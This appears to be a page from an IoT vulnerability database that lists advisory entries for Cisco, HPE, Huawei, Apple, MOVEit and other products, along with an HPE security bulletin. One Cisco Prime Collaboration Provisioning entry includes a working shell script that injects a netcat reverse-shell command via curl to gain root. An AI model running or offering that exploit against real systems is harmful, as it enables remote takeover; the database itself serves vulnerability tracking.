VARIoT IoT vulnerabilities database

InforCube Next Generation Firewall (NFW) is an integrated security gateway security solution. There is a remote command execution vulnerability in Shanghai News's next-generation firewall system. Allows an attacker to write php code to a file by modifying the install.php post data package, and successfully executes the php code with this file to obtain a webshell.

Buffalo is a router made by an American company. The Buffalo routing product has a general cookie forgery login vulnerability. An attacker can use the vulnerability to modify the cookie information, bypass login authentication and log in to the WEB console to obtain router control permissions.

An Authentication Bypass vulnerability in HPE MSA 1040 and HPE MSA 2040 SAN Storage in version GL220P008 and earlier and was found. HPE MSA 1040 and MSA 2040 SAN Storage Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. HPEMSA1040 and MSA2040SANStorage are storage devices of Hewlett Packard Enterprise (HPE). An elevation of privilege vulnerability exists in HPEMSA1040 and MSA2040SANStorageGL220P008 and earlier. A remote attacker can exploit this vulnerability to increase privileges. An attacker may leverage these issues to bypass the authentication mechanism and gain unauthorized access or to gain elevated privileges. This may aid in further attacks

An Authentication Bypass vulnerability in HPE MSA 1040 and MSA 2040 SAN Storage IN version GL220P008 and earlier was found. HPE MSA 1040 and MSA 2040 SAN Storage Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. HPEMSA1040 and MSA2040SANStorage are storage devices of Hewlett Packard Enterprise (HPE). An authentication vulnerability exists in HPEMSA1040 and MSA2040SANStorageGL220P008 and earlier. A remote attacker could exploit the vulnerability to bypass authentication. An attacker may leverage these issues to bypass the authentication mechanism and gain unauthorized access or to gain elevated privileges. This may aid in further attacks

An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. macOS before 10.12.5 is affected. tvOS before 10.2.1 is affected. watchOS before 3.2.2 is affected. The issue involves the "CoreFoundation" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted data. Apple iOS, WatchOS, macOS and tvOS are prone to a memory corruption vulnerability. Failed exploit attempts may result in a denial-of-service condition. The following versions fixes the issue: Versions prior to Apple iOS 10.3.2 Versions prior to Apple watchOS 3.2.2 Versions prior to Apple tvOS 10.2.1 Versions prior to Apple macOS 10.12.5. Apple iOS is an operating system developed for mobile devices; watchOS is an operating system for smart watches. CoreFoundation is one of the C language application programming interface (API) components

Security vulnerabilities in the HPE Integrated Lights-Out 2 (iLO 2) firmware could be exploited remotely to allow authentication bypass, code execution, and denial of service. HPE Integrated Lights-Out 2 (iLO 2) is a set of remote control solutions from Hewlett Packard Enterprise (HPE) in the United States. This solution enables remote monitoring and operation and maintenance of IT assets such as servers. A security vulnerability exists in HPE iLO 2 version 2.29

Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname. An attacker could exploit this vulnerability to read arbitrary files

Ipswitch MOVEit Transfer (formerly DMZ) allows pre-authentication blind SQL injection. The fixed versions are MOVEit Transfer 2017 9.0.0.201, MOVEit DMZ 8.3.0.30, and MOVEit DMZ 8.2.0.20. Ipswitch MOVEit Transfer ( Old DMZ) Is SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Ipswitch MOVEit Transfer (formerly known as DMZ) is an automated file transfer system developed by Ipswitch in the United States. The system supports control, management, and visibility into all business-critical file transfer activities through a single, secure system. A security vulnerability exists in Ipswitch MOVEit Transfer. An attacker could exploit the vulnerability to bypass the protection mechanism

A vulnerability in the web interface of Cisco Prime Collaboration Provisioning Software (prior to Release 11.1) could allow an authenticated, remote attacker to view any file on an affected system. The vulnerability exists because the affected software does not perform proper input validation of HTTP requests and fails to apply role-based access controls (RBACs) to requested HTTP URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request that uses directory traversal techniques to submit a path to a desired file location on an affected system. A successful exploit could allow the attacker to view any file on the system. Cisco Bug IDs: CSCvc99604. Vendors have confirmed this vulnerability Bug ID CSCvc99604 It is released as.Information may be obtained. Authentication is not required to exploit this vulnerability.The specific flaw exists within the service that listens on TCP port 443 by default. Access to the /logs/cupm directory is unrestricted. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Information harvested may aid in launching further attacks. The software is IP Telephony, Voicemail, and Unified Communications environments provide IP Communication service function

A remote code execution vulnerability was identified in HPE Intelligent Management Center (iMC) Wireless Service Manager (WSM) Software earlier than version WSM 7.3 (E0506). This issue was resolved in HPE IMC Wireless Services Manager Software IMC WSM 7.3 E0506P01 or subsequent version. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of the strMac parameter provided to the macToByte method. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. The solution provides network-wide visibility for comprehensive management of resources, services and users. Wireless Service Manager (WSM) Software is one of the wireless service management software. The vulnerability stems from the fact that the program does not verify the length of the data submitted by the user, causing the size of the copied data to exceed the fixed-length buffer space based on the stack

A vulnerability in the web interface for Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to bypass authentication and perform command injection with root privileges. The vulnerability is due to missing security constraints in certain HTTP request methods, which could allow access to files via the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted application. This vulnerability affects Cisco Prime Collaboration Provisioning Software Releases prior to 12.1. Cisco Bug IDs: CSCvc98724. Authentication is not required to exploit this vulnerability.The specific flaw exists within the ScriptMgr servlet, which listens on TCP port 443 by default. A crafted request can bypass authentication for this resource. An attacker can leverage this vulnerability to execute arbitrary code under the context of root. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may lead to further attacks. The software provides IP communications services functionality for IP telephony, voice mail, and unified communications environments. # Usage: ./prime-shell.sh <TARGET-IP> <ATTACKER-IP> <ATTACKER-PORT> function encode() { echo "$1" | perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"' } TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$(encode "/bin/bash") COMMAND=$(encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER $PORT >/tmp/f") SCRIPTTEXT="Runtime.getRuntime().exec(new%20String[]{\"$BASH\",\"-c\",\"$COMMAND\"});" curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT"

A vulnerability in the web interface of Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to access sensitive data. The attacker could use this information to conduct additional reconnaissance attacks. The vulnerability is due to insufficient protection of sensitive data when responding to an HTTP request on the web interface. An attacker could exploit the vulnerability by sending a crafted HTTP request to the application to access specific system files. An exploit could allow the attacker to obtain sensitive information about the application which could include user credentials. This vulnerability affects Cisco Prime Collaboration Provisioning Software Releases 10.6 through 11.5. Cisco Bug IDs: CSCvc99626. Authentication is not required to exploit this vulnerability.The specific flaw exists within the logconfigtracer.jsp page, which listens on TCP port 443 by default. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose any files accessible to the root user. This may result in further attacks. The software provides IP communications services functionality for IP telephony, voice mail, and unified communications environments

A vulnerability in the web interface of Cisco Prime Collaboration Provisioning Software (prior to Release 12.1) could allow an authenticated, remote attacker to delete any file from an affected system. The vulnerability exists because the affected software does not perform proper input validation of HTTP requests and fails to apply role-based access controls (RBACs) to requested HTTP URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request that uses directory traversal techniques to submit a path to a desired file location on an affected system. A successful exploit could allow the attacker to delete any file from the system. Cisco Bug IDs: CSCvc99597. Vendors have confirmed this vulnerability Bug ID CSCvc99597 It is released as.Information may be tampered with. Authentication is not required to exploit this vulnerability.The specific flaw exists within the licensestatus.jsp page, which listens on TCP port 443 by default. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. The software provides IP communications services functionality for IP telephony, voice mail, and unified communications environments

A vulnerability in the web framework of the Cisco TelePresence IX5000 Series could allow an unauthenticated, remote attacker to access arbitrary files on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by using directory traversal techniques to read files within the Cisco TelePresence IX5000 Series filesystem. This vulnerability affects Cisco TelePresence IX5000 Series devices running software version 8.2.0. Cisco Bug IDs: CSCvc52325. Information harvested may aid in launching further attacks. The solution provides components such as audio and video space, which can provide remote participants with a face-to-face virtual meeting room effect

A vulnerability in the web interface of Cisco Prime Collaboration Provisioning Software (prior to Release 11.1) could allow an authenticated, remote attacker to delete any file from an affected system. The vulnerability exists because the affected software does not perform proper input validation of HTTP requests and fails to apply role-based access controls (RBACs) to requested HTTP URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request that uses directory traversal techniques to submit a path to a desired file location on an affected system. A successful exploit could allow the attacker to delete any file from the system. Cisco Bug IDs: CSCvc99618. Vendors have confirmed this vulnerability Bug ID CSCvc99618 It is released as.Information may be tampered with. Authentication is not required to exploit this vulnerability.The specific flaw exists within the logconfigtracer.jsp page, which listens on TCP port 443 by default. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. The software provides IP communications services functionality for IP telephony, voice mail, and unified communications environments

A Unauthenticated Remote Denial of Service vulnerability was identified in HPE Integrated Lights-Out 3 (iLO 3) version v1.88 only. The vulnerability is resolved in iLO3 v1.89 or subsequent versions. Exploiting this issue allows remote attackers to trigger denial-of-service conditions. HPE Integrated Lights-Out 3 (iLO3) is an embedded server management technology of Hewlett Packard Enterprise (HPE), which uses an integrated remote management port to monitor and maintain the health of the server and remotely manage the server wait. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03826en_us SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: hpesbhf03826en_us Version: 1 HPESBHF03826 rev.1 - HPE Integrated Lights-Out 3 (iLO 3) Remote Denial of Service NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. References: - CVE-2017-8987 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com. Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX Copyright 2016 Hewlett Packard Enterprise Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBCAAGBQJalX6NAAoJELXhAxt7SZaidm8H/0o/kMTpJiRFB7LlHsfEVWKZ NiJd/DFVmKbkqFS20jAKC7k8a0PdHxkDJ8svUEGOzbUGDcJX9TfIjqk1sSYkMs+c 4i0qlyyH3VtpZy10A26gP9qsLVrOm2b0skfmEtuqCsXRFe6/OH5dppelSukFStwN /L3Mvga3Ti/wUYNlx83Vsfhdm+WYZXEBV9yG2G/So0chIEJwB7nxtj/kmDXr6vPT zoV4RZ1QaNQ6DebxGdgRIcxDTIB6wRSPB4bDldc+VhiPbAXJ0wcx1llloEdkvwvg UPw+tkb4U4at47iGa3+FrOONP/4kmPBcHQRxRp3EzmrdS7Oexr5zAAphx6aOb04= =NVRE -----END PGP SIGNATURE-----

HPE has identified a cross site scripting (XSS) vulnerability in HPE CentralView Fraud Risk Management earlier than version CV 6.1. This issue is resolved in HF16 for HPE CV 6.1 or subsequent version

HPE has identified a remote privilege escalation vulnerability in HPE CentralView Fraud Risk Management earlier than version CV 6.1. This issue is resolved in HF16 for HPE CV 6.1 or subsequent version. HPE CentralView Fraud Risk Management Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state

AC6005 with software V200R006C10, AC6605 with software V200R006C10 have a DoS Vulnerability. An attacker can send malformed packets to the device, which causes the device memory leaks, leading to DoS attacks. Huawei AC6005 and AC6605 Software contains resource management vulnerabilities.Service operation interruption (DoS) There is a possibility of being put into a state. The AC6005 and AC6605 are both a box-type wireless access controller from China's Huawei. The AC6005 is a small box-type wireless access controller for small and medium-sized enterprises. The AC6605 is a box-type wireless access controller for medium and large enterprises. A denial of service vulnerability exists in the V200R006C10 version of HuaweiAC6005/AC6605. Multiple Huawei products are prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause denial-of-service conditions. The vulnerability is caused by the program not performing input validation sufficiently

A vulnerability in the TCP throttling process for the GUI of the Cisco Identity Services Engine (ISE) 2.1(0.474) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device where the ISE GUI may fail to respond to new or established connection requests. The vulnerability is due to insufficient TCP rate limiting protection on the GUI. An attacker could exploit this vulnerability by sending the affected device a high rate of TCP connections to the GUI. An exploit could allow the attacker to cause the GUI to stop responding while the high rate of connections is in progress. Cisco Bug IDs: CSCvc81803. Vendors report this vulnerability Bug ID CSCvc81803 Published as.Denial of service (DoS) May be in a state. An attacker can exploit this issue to cause a denial-of-service condition; denying service to legitimate users. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies